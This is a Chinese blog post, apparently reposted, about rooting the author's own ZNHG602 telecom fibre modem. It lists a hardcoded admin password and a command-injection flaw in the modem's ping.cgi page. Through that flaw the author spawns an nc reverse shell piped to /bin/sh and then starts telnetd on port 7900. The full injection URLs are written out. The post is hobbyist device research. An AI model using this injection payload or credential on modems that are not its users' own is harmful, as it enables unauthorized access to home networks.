标签：127.0 8080 ZNHG602 0.1 nc 192.168 telnet 破解

前几天办了新宽带，电信又拿了个新品牌的光猫，看背面写的是兆能(好吧不认识T_T)

按照惯例打开192.168.1.1:8080 界面，结果自动跳到了新luci界面。用惯用手段获取密码:(小提示:在80界面密码栏直接输入nE7jA%5m即可登录8080，无需修改用户名)

打开ftp连接光猫，显示Pure_Ftpd(挺先进)，用useradmin登录，看到了熟悉的romfile，下载到电脑发现没有加密！正当我激动之时发现里面并没有telnet设置……通过一番寻找找到8080端口的网页在/usr/share/web下，找到了ftpandTelnet.cgi这个文件，但用浏览器访问是，电信直接封死了……有关备份和更新的也同样被封死。。。那就只能通过其他方式了。

0.ftp：通过四处寻找脚本发现/var下有Speedtest脚本，可能是手机端测速功能的后端，ftp上传一个反弹shell脚本上去，但手机上点测速并没有效果，而且登录回去发现文件并未被修改。可能ftpd有权限设置/系统只读但运用了overlay

1.ttl：光猫后螺丝只上了两个螺丝，另外一侧是卡上去的(好省钱……)，用一把尺子轻松拆开。正面有几块黑胶，拆开后底下有熟悉的四个触点，还贴心的标上了TX RX，明摆着让你用呢！但putty连上后失望了，需要登录。用e8c和useradmin/admin都显示error，方法不通。

2.网页漏洞：(1)起初以为telnet服务是启动的(nmap显示23端口是filtered)，在luci页面中端口映射127.0.0.1:23至127.0.0.1:23打开23端口，telnet连接后是连接重置……压根telnetd就没起来！

(2)在8080页面有ping.cgi，输入127.0.0.1测试后链接变成了http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=127.0.0.1&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1，关键点:addr可修改！修改地址为diagAddrT=127.0.0.1|ls后并没有出现报错，显示内容正常！直接运行telnetd经过实验什么都没有发生……在窗口看不到错误原因，因此可以尝试寻找可以反弹shell的工具。通过which nc找到nc。尝试直接用nc -e /bin/sh反弹 果不其然没有-e选项。因此用http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=&nc 192.168.1.2 8080|/bin/sh|nc 192.168.1.2 8081&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1成功反弹出shell，但60s后会报错且无法连接，显然不是我们的目的。在nc中再次运行telnetd -l /bin/login 后成功，但telnet依旧无法连接。发现光猫有upnp功能，因此7900端口可能是开放，因此修改命令为telnetd -l /bin/login -p 7900，终于能连通。login处useradmin和密码成功登录且为root权限！至此破解telnet结束。

(提供一个不需要nc直接网页访问就能开启telnet的链接:链接)

仍需解决的问题:1.在dev下发现mtd*，但通过mount不能找到根目录具体是mtd几，根目录应该是squashfs，但dd提取出的镜像在linux下不能直接挂载和binwalk提取。

2.配置文件真实路径为/var/pdm/config.xml，但直接修改后重启会恢复原样，而且/var无法判断是squashfs还是单纯的tmpfs。/var/rdm下还有另外的配置文件，但貌似有加密无法解读。

标签：127.0,8080,ZNHG602,0.1,nc,192.168,telnet,破解
来源： https://www.cnblogs.com/tianpanyu/p/15611523.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。